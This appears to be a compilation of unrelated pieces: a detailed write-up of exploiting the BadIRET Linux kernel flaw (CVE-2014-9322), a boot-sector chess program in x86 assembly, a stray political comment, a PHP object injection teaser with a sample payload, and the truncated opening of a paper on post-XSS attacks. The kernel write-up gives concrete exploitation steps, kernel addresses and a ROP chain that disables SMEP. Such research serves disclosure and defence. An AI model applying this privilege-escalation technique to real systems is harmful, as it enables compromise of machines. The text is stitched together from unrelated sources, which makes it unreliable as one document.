Exploiting “BadIRET” vulnerability February 2, 2015 / Rafal Wojtczuk Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation) Introduction CVE-2014-9322 is described as follows: arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not properly handle faults associated with the Stack Segment (SS) segment register, which allows local users to gain privileges by triggering an IRET instruction that leads to access to a GS Base address from the wrong space. It was fixed on 23rd November 2014 with this commit. I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there. All experiments were conducted on Fedora 20 system, running 64bit 3.11.10-301 kernel; all the discussion is 64bit-specific. Short results summary: With the tested kernel, the vulnerability can be reliably exploited to achieve kernelmode arbitrary code execution. SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution. Digression: kernel, usermode, iret The vulnerability In a few cases, when Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to bad_iret function, that does /* So pretend we completed the iret and took the #GPF in user mode.*/ pushq $0 SWAPGS jmp general_protection As the comment explains, the subsequent code flow should be identical to the case when general protection exception happens in user mode (just jump to the #GP handler). This works well in case of most of the exceptions that can be raised by iret, e.g. #GP. The problematic case is #SS exception. 
If a kernel is vulnerable (so, before kernel version 3.17.5) and has “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – the “push” instruction generates a page fault that gets converted into a double fault. I have not analysed this scenario; from now on, we focus on a pre-3.16 kernel, with no “espfix”. The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. In comparison with e.g. the #GP handler, the #SS exception handler does one extra swapgs instruction. In case you are not familiar with swapgs semantics, read the below paragraph, otherwise skip it. Digression: swapgs instruction When memory is accessed with a gs segment prefix, like this: mov %gs:LOGICAL_ADDRESS, %eax the following actually happens: BASE_ADDRESS value is retrieved from the hidden part of the segment register memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced The base address is initially derived from the Global Descriptor Table (or LDT). However, there are situations where the GS segment base is changed on the fly, without involving the GDT. Quoting the SDM: “SWAPGS exchanges the current GS base register value with the value contained in MSR address C0000102H (IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction intended for use by system software. (…) The kernel can then use the GS prefix on normal memory references to access [per-cpu] kernel data structures.” For each CPU, the Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure's address. Therefore, the usual pattern of e.g.
syscall handler is: swapgs (now the gs base points to kernel memory) access per-cpu kernel data structures via memory instructions with gs prefix swapgs (it undoes the result of the previous swapgs, gs base points to usermode memory) return to usermode Naturally, kernel code must ensure that whenever it wants to access per-cpu data with the gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is odd (so that gs base points to kernel memory). Triggering the vulnerability By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, the kernel will try to access important data structures with a wrong gs base, controllable by the user. When is the #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of the iret instruction, it says: 64-Bit Mode Exceptions: #SS(0) If an attempt to pop a value off the stack violates the SS limit. If an attempt to pop a value off the stack causes a non-canonical address to be referenced. None of these conditions can be forced to happen in kernel mode. However, the pseudocode for iret (in the same SDM) shows another case: when the segment defined by the return frame is not present: IF stack segment is not present THEN #SS(SS selector); FI; So, in usermode, we need to set the ss register to something not present. It is not straightforward: we cannot just use mov $nonpresent_segment_selector, %eax mov %ax, %ss as the latter instruction will generate #GP. Setting ss via debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on 64bit systems (it might work on 32bit, though).
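As an aside, the swapgs bookkeeping above can be reduced to a toy parity model. The Python below is obviously not kernel code; it only tracks the gs-base swaps to illustrate how one extra swapgs on the #SS path leaves kernel code running with a user-controlled gs base:

```python
USER_BASE, KERNEL_BASE = "user gs base", "kernel gs base"

class Cpu:
    """Tracks only the gs base and the IA32_KERNEL_GS_BASE MSR."""
    def __init__(self):
        self.gsbase = USER_BASE          # usermode is running
        self.msr = KERNEL_BASE           # IA32_KERNEL_GS_BASE
    def swapgs(self):
        self.gsbase, self.msr = self.msr, self.gsbase

cpu = Cpu()
cpu.swapgs()   # kernel entry from usermode: gs base -> kernel per-cpu area
cpu.swapgs()   # kernel is about to iret back to usermode
# iret throws #SS; a balanced handler would swapgs once on entry, once on exit
cpu.swapgs()   # #SS handler entry
cpu.swapgs()   # the one-too-many swapgs on the bad_iret path
# general_protection now executes kernel code, but gs-prefixed reads
# (e.g. the "current" lookup) hit the *user-controlled* base:
broken = cpu.gsbase
```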
The solution is: thread A: create a custom segment X in LDT via the sys_modify_ldt syscall thread B: ss:=X_selector thread A: invalidate X via sys_modify_ldt thread B: wait for hardware interrupt The reason why one needs two threads (both in the same process) is that the return from a syscall (including sys_modify_ldt) is done via the sysret instruction, which hardcodes the ss value. If we invalidated X in the same thread that did the “ss:=X” instruction, ss would be undone. Running the above code results in a kernel panic. In order to do something more meaningful, we will need to control the usermode gs base; it can be set via the arch_prctl(ARCH_SET_GS) syscall. Achieving write primitive If we run the above code, then the #SS handler runs fine (meaning: it will not touch memory at gs base), returns into bad_iret, which in turn jumps to the #GP exception handler. This runs fine for a while, and then calls the following function: 289 dotraplinkage void 290 do_general_protection(struct pt_regs *regs, long error_code) 291 { 292 struct task_struct *tsk; ... 306 tsk = current; 307 if (!user_mode(regs)) { ... it is not reached 317 } 318 319 tsk->thread.error_code = error_code; 320 tsk->thread.trap_nr = X86_TRAP_GP; 321 322 if (show_unhandled_signals && unhandled_signal(tsk, SIGSEGV) && 323 printk_ratelimit()) { 324 pr_info("%s[%d] general protection ip:%lx sp:%lx error:%lx", 325 tsk->comm, task_pid_nr(tsk), 326 regs->ip, regs->sp, error_code); 327 print_vma_addr(" in ", regs->ip); 328 pr_cont("\n"); 329 } 330 331 force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk); 332 exit: 333 exception_exit(prev_state); 334 } It is far from obvious from the C code, but the assignment to tsk from the current macro uses a memory read with gs prefix. Line 306 is actually: 0xffffffff8164b79d : mov %gs:0xc780,%rbx This gets interesting. We control the “current” pointer, which points to the giant data structure describing the whole Linux process.
Particularly, the lines 319 tsk->thread.error_code = error_code; 320 tsk->thread.trap_nr = X86_TRAP_GP; are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are the constants 0 and 0xd, respectively), but this should not be a problem. Game over? Not quite. Say we want to overwrite some important kernel data structure at X. If we do the following steps: prepare usermode memory at FAKE_PERCPU, and set gs base to it Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET = X – offsetof(struct task_struct, thread.error_code) trigger the vulnerability Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. the unhandled_signal() function dereferences a pointer from task_struct. We have no control over what lies beyond X, and the result will be a page fault in the kernel. How can we cope with this? Options: Do nothing. The Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process and tries to continue (while Windows bluescreens immediately). This does not work – the result is massive kernel data corruption and a whole-system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes. Use the “tsk->thread.error_code = error_code” write to overwrite the IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before. This does not work either, for two reasons: Linux makes the IDT read-only (bravo!) even if the IDT were writeable, we do not control the overwrite value – it is 0 or 0xd.
If we overwrite the top DWORDs of the IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of these two addresses being a useful stack pivot sequence are negligible. We can try a race. Say the “tsk->thread.error_code = error_code” write facilitates code execution, e.g. allows us to control a code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm. I tried this approach a couple of times, with no luck; perhaps with a different vulnerability the timings would be different and it would work better. Throw in the towel on the “tsk->thread.error_code = error_code” write. With some disgust, we will follow the last option. We will point “current” to a usermode location, setting the pointers in it so that the read dereferences on them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences.
Achieving write primitive continued, aka life after do_general_protection Our next chance is the function called by do_general_protection(): int force_sig_info(int sig, struct siginfo *info, struct task_struct *t) { unsigned long int flags; int ret, blocked, ignored; struct k_sigaction *action; spin_lock_irqsave(&t->sighand->siglock, flags); action = &t->sighand->action[sig-1]; ignored = action->sa.sa_handler == SIG_IGN; blocked = sigismember(&t->blocked, sig); if (blocked || ignored) { action->sa.sa_handler = SIG_DFL; if (blocked) { sigdelset(&t->blocked, sig); recalc_sigpending_and_wake(t); } } if (action->sa.sa_handler == SIG_DFL) t->signal->flags &= ~SIGNAL_UNKILLABLE; ret = specific_send_sig_info(sig, info, t); spin_unlock_irqrestore(&t->sighand->siglock, flags); return ret; } The field “sighand” in task_struct is a pointer that we can set to an arbitrary value. It means that the lines action = &t->sighand->action[sig-1]; action->sa.sa_handler = SIG_DFL; are another chance for a write primitive to an arbitrary location. Again, we do not control the written value – it is the constant SIG_DFL, equal to 0. This finally works, hurray! With a little twist, though. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly the sighand field in it) so that X = address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is the line spin_lock_irqsave(&t->sighand->siglock, flags); As t->sighand->siglock is at a constant offset from t->sighand->action[sig-1].sa.sa_handler, the kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose content we do not control. What happens then? There are two possibilities: memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. The final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good. memory at X+SPINLOCK looks like a locked spinlock.
spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react. This is worrying. In order to bypass this, we will need another assumption – we will need to know we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we will set X to be in the kernel .data section. We will do the following: initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE force_sig_info() will hang in spin_lock_irqsave at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE spin_lock_irqsave will return. force_sig_info() will reload t->sighand, and perform the desired write. A careful reader is encouraged to enquire why we cannot use the latter approach in the case where X+SPINLOCK is initially unlocked. This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because the usermode ss value on the stack still refers to a non-present segment). But this time, the extra swapgs instruction in the #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on the real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable. Digression: SMEP SMEP is a feature of Intel processors, starting from the 3rd generation of Core processors.
If the SMEP bit is set in CR4, the CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available. Achieving code execution The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled? Overwriting a kernel code pointer would not work. We can either nullify its top bytes – but then the resulting address would be in usermode, and SMEP will prevent dereference of this pointer. Alternatively, we can nullify a few low bytes, but then the chances that the resulting pointer would point to a useful stack pivot sequence are low. What we need is a kernel pointer P to a structure X that contains code pointers. We can overwrite the top bytes of P so that the resulting address is in usermode, and a P->code_pointer_in_X() call will jump to a location that we can choose. I am not sure what is the best object to attack. For my experiments, I chose the kernel proc_root variable. It is a structure of type struct proc_dir_entry { ... const struct inode_operations *proc_iops; const struct file_operations *proc_fops; struct proc_dir_entry *next, *parent, *subdir; ... u8 namelen; char name[]; }; This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called: struct inode_operations { struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int); void * (*follow_link) (struct dentry *, struct nameidata *); ...many more... int (*update_time)(struct inode *, struct timespec *, int); ... } ____cacheline_aligned; proc_root resides in the kernel data section. It means that the exploit needs to know its address.
This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline, along with the tens of offsets required to build FAKE_CURRENT. So, we will overwrite proc_root.subdir so that it becomes a pointer to a controlled struct proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdir be 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to: map 16MB of memory at address 4096 fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to the usermode address FAKE_IOPS, and the name field being the “A” string configure the exploit to overwrite the top 5 bytes of proc_root.subdir Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info(), proc_root.subdir will point to controlled usermode memory. When our process calls open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to? If you think the answer is “to our shellcode”, go back and read again. We will need to point FAKE_IOPS pointers to a stack pivot sequence. This again assumes knowledge of the precise version of the kernel running. The usual “xchg %esp, %eax; ret” code sequence (it is two bytes only, 94 c3, found at 0xffffffff8119f1ed in the case of the tested kernel) works very well for 64bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32bit registers, thus clearing the high 32 bits of %rsp and landing %rsp in usermode memory.
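Two pieces of address arithmetic above are easy to sanity-check: zeroing the top 5 bytes of a little-endian 8-byte pointer keeps only its low 3 bytes (hence the 16MB mapping starting at page 1), and the 32-bit xchg zero-extends into %rsp. A quick Python check (the proc_root.subdir value below is made up; the gadget address is the one quoted above):

```python
import struct

MASK32 = 0xffffffff

def zero_top5(ptr):
    """The write primitive lands 8 zero bytes so that only the top 5
    overlap the pointer: little-endian, so its low 3 bytes survive."""
    raw = bytearray(struct.pack("<Q", ptr))
    raw[3:] = b"\x00" * 5
    return struct.unpack("<Q", bytes(raw))[0]

def xchg_esp_eax(rax):
    """xchg %esp,%eax in long mode zero-extends: rsp := low 32 bits of rax."""
    return rax & MASK32

subdir = 0xffffffff81c3a123                # hypothetical proc_root.subdir value
faked = zero_top5(subdir)                  # 0xc3a123: inside the 16MB mapping
pivot = xchg_esp_eax(0xffffffff8119f1ed)   # 0x8119f1ed: a mappable usermode rsp
```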
In the worst case, we may need to allocate the low 4GB of virtual memory and fill it with the ROP chain. In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed: %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax) %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the ROP chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of the FAKE_IOPS pointers. In the second case, %rsp will be assigned the low 32 bits of the call target, so 0x8119f1ed. We need to prepare the ROP chain at this address as well. To sum up, as the %rax value has one of two known values at the moment of entry to the stack pivot sequence, we do not need to fill the whole 4G with the ROP chain, just the above two addresses. The ROP chain itself is straightforward, shown for the second case: unsigned long *stack=0x8119f1ed; *stack++=0xffffffff81307bcdULL; // pop rdi, ret *stack++=0x407e0; //cr4 with smep bit cleared *stack++=0xffffffff8104c394ULL; // mov rdi, cr4; pop %rbp; ret *stack++=0xaabbccdd; // placeholder for rbp *stack++=actual_shellcode_in_usermode_pages; Digression: SMAP SMAP is a feature of Intel processors, starting from the 5th generation of Core processors. If the SMAP bit is set in CR4, the CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available.
A test kernel module (run on a system with a Core-M 5Y10a CPU) that tries to access usermode crashes with: [ 314.099024] running with cr4=0x3407e0 [ 389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000 [ 389.885455] IP: [<ffffffffa0832029>] test_write_proc+0x29/0x50 [smaptest] [ 389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867 [ 389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b As we can see, although the usermode page is present, access to it throws a page fault. Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in the case of Linux, access to usermode is performed explicitly, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in an exception handler, so it is more difficult to adjust all the drivers in all the required places to work properly with SMAP. SMAP to the rescue! The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – the CPU will refuse to read malicious data from usermode. What we could do is craft all the required data structures, and then copy them to the kernel. For instance, if one does write(pipe_filedescriptor, evil_data, ... then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP.
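The quoted cr4 values can be decoded bit by bit: SMEP is CR4 bit 20, SMAP is bit 21, and FSGSBASE (which matters for the gs-base discussion below) is bit 16. A small Python check:

```python
CR4_FSGSBASE = 1 << 16   # allows usermode wrgsbase/rdgsbase
CR4_SMEP     = 1 << 20
CR4_SMAP     = 1 << 21

def cr4_flags(cr4):
    return {"FSGSBASE": bool(cr4 & CR4_FSGSBASE),
            "SMEP": bool(cr4 & CR4_SMEP),
            "SMAP": bool(cr4 & CR4_SMAP)}

linux = cr4_flags(0x3407e0)     # the Fedora box from the dmesg above
windows = cr4_flags(0x1506f8)   # Windows 10 TP build 9926, same hardware
```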
However, there is one more hurdle – remember, we need to set the usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used the arch_prctl(ARCH_SET_GS) syscall, which is implemented in the following way in the kernel: long do_arch_prctl(struct task_struct *task, int code, unsigned long addr) { int ret = 0; int doit = task == current; int cpu; switch (code) { case ARCH_SET_GS: if (addr >= TASK_SIZE_OF(task)) return -EPERM; ... honour the request otherwise Houston, we have a problem – we cannot use this API to set the gs base above the end of usermode memory! Recent CPUs feature the wrgsbase instruction, which sets the gs base directly. This is a nonprivileged instruction, but it needs to be enabled by the kernel by setting the FSGSBASE bit (no 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction. On 64bits, non-system entries in the GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so, no chance to set up a segment with a base address in kernel space. So, unless I missed another way to set the usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322. Source: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
-
Toledo Atomchess Game By January 28, 2015, a new chess program written in 487 bytes of x86 assembly code came to my knowledge. I didn't ever run it and moved on to other things, as I was kind of busy. Nevertheless my friends from JS1K and Twitter encouraged me to do something, and I have some notions of x86 machine code. So I started coding my own chess program in x86 assembler; I finished it in 24 hours and spent another 24 hours debugging it. After this I gave a look at the documentation of the other chess program and I was surprised that it made illegal movements and didn't even have a search tree; for me that is like not playing any chess. So here it is: my game is Toledo Atomchess, it is 481 bytes of x86 assembly code and it plays very reasonably under the limitations. Plays basic chess movements (no en passant, no castling and no promotion) Enter your movements as basic algebraic (D2D4) Your movements aren't checked for legality Search depth of 3-ply How to run it To run it you need a 1.44 MB floppy disk and to put the 512 bytes into the boot sector using a utility like Rawrite; it is also available as a COM file runnable in MS-DOS or a Wind*ws command line. Download Toledo Atomchess package (5.8K) The source code Here is the full source code:

        ;
        ; Toledo Atomchess
        ;
        ; by Óscar Toledo Gutiérrez
        ;
        ; © Copyright 2015 Óscar Toledo Gutiérrez
        ;
        ; Creation: 28-ene-2015 21:00 local time.
        ; Revision: 29-ene-2015 18:17 local time. Finished.
        ; Revision: 30-ene-2015 13:34 local time. Debugging finished.

        ; Features:
        ; * Basic chess movements.
        ; * Enter moves as algebraic form (D2D4) (note your moves aren't validated)
        ; * Search depth of 3-ply
        ; * No promotion of pawns.
        ; * No castling
        ; * No en passant.
        ; * 481 bytes size (fits in a boot sector)

        ; Note: I'm lazy enough to write my own assembler instead of
        ; searching for one, so you will have to excuse my syntax

        code16

        ; Change to org &0100 for COM file
        org &7c00

        ; Housekeeping
        mov sp,stack
        cld
        push cs
        push cs
        push cs
        pop ds
        pop es
        pop ss
        ; Create board
        mov bx,board
sr1:    mov al,bl
        and al,&88              ; 0x88 board
        jz sr2
        mov al,&07              ; Frontier
sr2:    mov [bx],al
        inc bl
        jnz sr1
        ; Setup board
        mov si,initial
sr3:    lodsb                   ; Load piece
        mov [bx],al             ; Black pieces
        or al,8
        mov [bx+&70],al         ; White pieces
        mov al,&01
        mov [bx+&10],al         ; Black pawn
        mov al,&09
        mov [bx+&60],al         ; White pawn
        inc bx
        cmp bl,&08
        jnz sr3

        ;
        ; Main loop
        ;
sr21:   call display_board
        call key2
        push di
        call key2
        pop si
        movsb
        mov byte [si-1],0
        call display_board
        mov ch,&08              ; Current turn (0=White, 8=Black)
        call play
        jmp short sr21

        ;
        ; Computer plays
        ;
play:   mov bp,-32768           ; Current score
        push bp                 ; Origin square
        push bp                 ; Target square
        xor ch,8                ; Change side
        mov si,board
sr7:    lodsb                   ; Read square
        xor al,ch               ; XOR with current playing side
        dec ax
        cmp al,6                ; Ignore if frontier
        jnc sr6
        or al,al                ; Is it pawn?
        jnz sr8
        or ch,ch                ; Is it playing black?
        jnz sr25                ; No, jump
sr8:    inc ax
sr25:   dec si
        mov bx,offsets
        push ax
        xlat
        mov dh,al               ; Movements offset
        pop ax
        mov bl,total&255
        xlat
        mov dl,al               ; Total movements of piece
sr12:   mov di,si               ; Restart target square
        mov bl,displacement&255
        mov al,dh
        xlat
        mov cl,al
sr9:    add di,cx
        and di,&ff
        or di,board
        mov al,[si]             ; Content of: origin in al, target in ah
        mov ah,[di]
        or ah,ah                ; Empty square?
        jz sr10
        xor ah,ch
        sub ah,&09              ; Valid capture?
        cmp ah,&06
        mov ah,[di]
        jnc sr18                ; No, avoid
        cmp dh,14               ; Pawn?
        jc sr19
        test cl,1               ; Straight?
        je sr18                 ; Yes, avoid
        jmp short sr19
sr10:   cmp dh,14               ; Pawn?
        jc sr19
        test cl,1               ; Diagonal?
        jne sr18                ; Yes, avoid
sr19:   push ax                 ; Save for restoring in near future
        mov bl,scores&255
        mov al,ah
        and al,7
        cmp al,6                ; King eaten?
        jne sr20
        cmp sp,stack-(3+8+3)*2  ; If in first response...
        mov bp,20000            ; ...maximum score (probably checkmate/stalemate)
        jne sr26
        mov bp,7811             ; Maximum score
sr26:   add sp,6                ; Ignore values
        jmp short sr24
sr20:   xlat
        cbw
;       cmp sp,stack-(3+8+3+8+3+8+3+8+3)*2      ; 4-ply depth
        cmp sp,stack-(3+8+3+8+3+8+3)*2          ; 3-ply depth
;       cmp sp,stack-(3+8+3+8+3)*2              ; 2-ply depth
;       cmp sp,stack-(3+8+3)*2                  ; 1-ply depth
        jbe sr22
        pusha
        movsb                   ; Do move
        mov byte [si-1],ah      ; Clear origin square
        call play
        mov bx,sp
        sub [bx+14],bp          ; Subtract BP from AX
        popa
sr22:   cmp bp,ax               ; Better score?
        jg sr23                 ; No, jump
        mov bp,ax               ; New best score
        jne sr27
        in al,(&40)
        cmp al,&55              ; Randomize it
        jb sr23
sr27:   pop ax
        add sp,4
        push si                 ; Save movement
        push di
        push ax
sr23:   pop ax                  ; Restore board
        mov [si],al
        mov [di],ah
sr18:   dec ax
        and al,&07              ; Was it pawn?
        jz sr11                 ; Yes, check special
        cmp al,&04              ; Knight or king?
        jnc sr14                ; End sequence, choose next movement
        or ah,ah                ; To empty square?
        jz sr9                  ; Yes, follow line of squares
sr16:   jmp short sr14
sr11:   and cl,&1f              ; Advanced it first square?
        cmp cl,&10
        jnz sr14
sr15:   or ah,ah                ; Pawn to empty square?
        jnz sr17                ; No, cancel double-square movement
        mov ax,si
        cmp al,&20              ; At first top row?
        jb sr14                 ; Yes, jump
        cmp al,&60              ; At first bottom row?
        jb sr17                 ; No, cancel double-square movement
sr14:   inc dh
        dec dl
        jnz sr12
sr17:   inc si
sr6:    cmp si,board+120
        jne sr7
        pop di
        pop si
        cmp sp,stack-2
        jne sr24
        cmp bp,-16384           ; Illegal move? (always in check)
        jl sr24                 ; Yes, doesn't move
        movsb
        mov byte [si-1],0
sr24:   xor ch,8
        ret

display_board:                  ; Display board
        call display3
        mov si,board
sr4:    lodsb
        mov bx,chars
        xlat
        call display2
sr5:    cmp si,board+128
        jnz sr4
        ret

key2:   mov di,board+127
        call key
        add di,ax
        call key
        shl al,4
        sub di,ax
        ret

key:    push di
        mov ah,0
        int &16
        push ax
        call display
        pop ax
        and ax,&0f
        pop di
        ret

display2:
        cmp al,&0d
        jnz display
display3:
        add si,7
        mov al,&0a
        call display
        mov al,&0d
display:
        push si
        mov ah,&0e
        mov bh,&00
        int &10
        pop si
        ret

initial:
        db 2,5,3,4,6,3,5,2
scores:
        db 0,10,50,30,90,30
chars:
        db ".prbqnk",&0d,".PRBQNK"
offsets:
        db 14,18,8,12,8,0,8
total:
        db 4, 4,4, 4,8,8,8
displacement:
        db -33,-31,-18,-14,14,18,31,33
        db -16,16,-1,1
        db 15,17,-15,-17
        db -16,-32
        db 15,17,16,32

        ; 29 bytes to say something
        db "Toledo Atomchess"
        db "nanochess.org"

        ;
        ; This marker is required for BIOS to boot floppy disk
        ;
        ds &7dfe-*              ; Change to &02fe for COM file
        db &55,&aa
board:  ds 256
        ds 256
stack:
        end

Source: Toledo Atomchess Game
-
That's nonsense. It's as if Italy showed up today claiming half of Europe belongs to them because it was once part of the Roman Empire.
-
Understanding PHP Object Injection
January 5, 2015 - Ionut Popescu

PHP Object Injection is not a very common vulnerability: it can be difficult to exploit, but it can also be really dangerous. In order to understand this vulnerability, a grasp of basic PHP code is required.

Vulnerable applications

If you think this is not an important class of vulnerability, see the list below. Researchers have found PHP Object Injection vulnerabilities in very common PHP applications:

- WordPress 3.6.1
- Magento 1.9.0.1
- Joomla 3.0.3
- IP Board 3.3.4

And many others. There may be a lot of other undiscovered PHP Object Injections in these or in other widely used PHP applications, so maybe you can take a coffee break and try to understand it.

Full article: http://securitycafe.ro/2015/01/05/understanding-php-object-injection/
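As a rough sketch of the pattern the linked article covers: the bug appears when user input reaches unserialize(), letting the attacker instantiate arbitrary classes with attacker-chosen properties, whose magic methods (__wakeup(), __destruct()) then run with those properties. The class and property names below are hypothetical, invented for illustration only:

```php
<?php
// Hypothetical class that happens to exist in the application's codebase.
class LogFile {
    public $filename = 'debug.log';

    // __destruct() runs automatically when the object goes out of scope.
    public function __destruct() {
        unlink($this->filename);   // side effect now under attacker control
    }
}

// Vulnerable pattern: user input passed straight to unserialize().
$obj = unserialize($_GET['data']);

// An attacker supplies a serialized LogFile with a chosen filename:
//   ?data=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}
// When $obj is destroyed, __destruct() deletes .htaccess instead of debug.log.
```

The fix is equally simple in principle: never feed user-controlled strings to unserialize(); use a data-only format such as json_decode() instead.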
-
Postcards from the post-XSS world
Michal Zalewski, <lcamtuf@coredump.cx>

1. Introduction

HTML markup injection vulnerabilities are one of the most significant and pervasive threats to the security of web applications. They arise whenever, in the process of generating HTML documents, the underlying code inserts attacker-controlled variables into the output stream without properly screening them for syntax control characters. Such a mistake allows the party controlling the offending input to alter the structure - and thus the meaning - of the produced document.

In practical settings, markup injection vulnerabilities are almost always leveraged to execute attacker-supplied JavaScript code in the client-side browsing context associated with the vulnerable application. The term cross-site scripting, a common name for this class of flaws, reflects the prevalence of this approach.

The JavaScript language is popular with attackers because of its versatility, and the ease with which it may be employed to exfiltrate arbitrarily chosen data, alter the appearance of the targeted website, or to perform server-side state changes on behalf of the authenticated user. Consequently, most of the ongoing browser-level efforts to improve the security of web applications focus on the containment of attacker-originating scripts. The most notable example of this trend is undoubtedly the Content Security Policy, a mechanism that removes the ability to inline JavaScript code in a protected HTML document, and maintains a whitelist of permissible sources for any externally-loaded scripts.
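The whitelist described above is conveyed as an HTTP response header. A minimal illustration of such a policy might look like this (the origins listed are made up for this example):

```
Content-Security-Policy: default-src 'self'; script-src 'self' https://static.example.com
```

Under a policy of this shape, inline <script> blocks and inline event handlers are refused outright, and external scripts may be loaded only from the document's own origin or from static.example.com; a script injected from anywhere else simply does not execute.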
Several related approaches, such as the NoScript add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note.

This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.

2. Content exfiltration

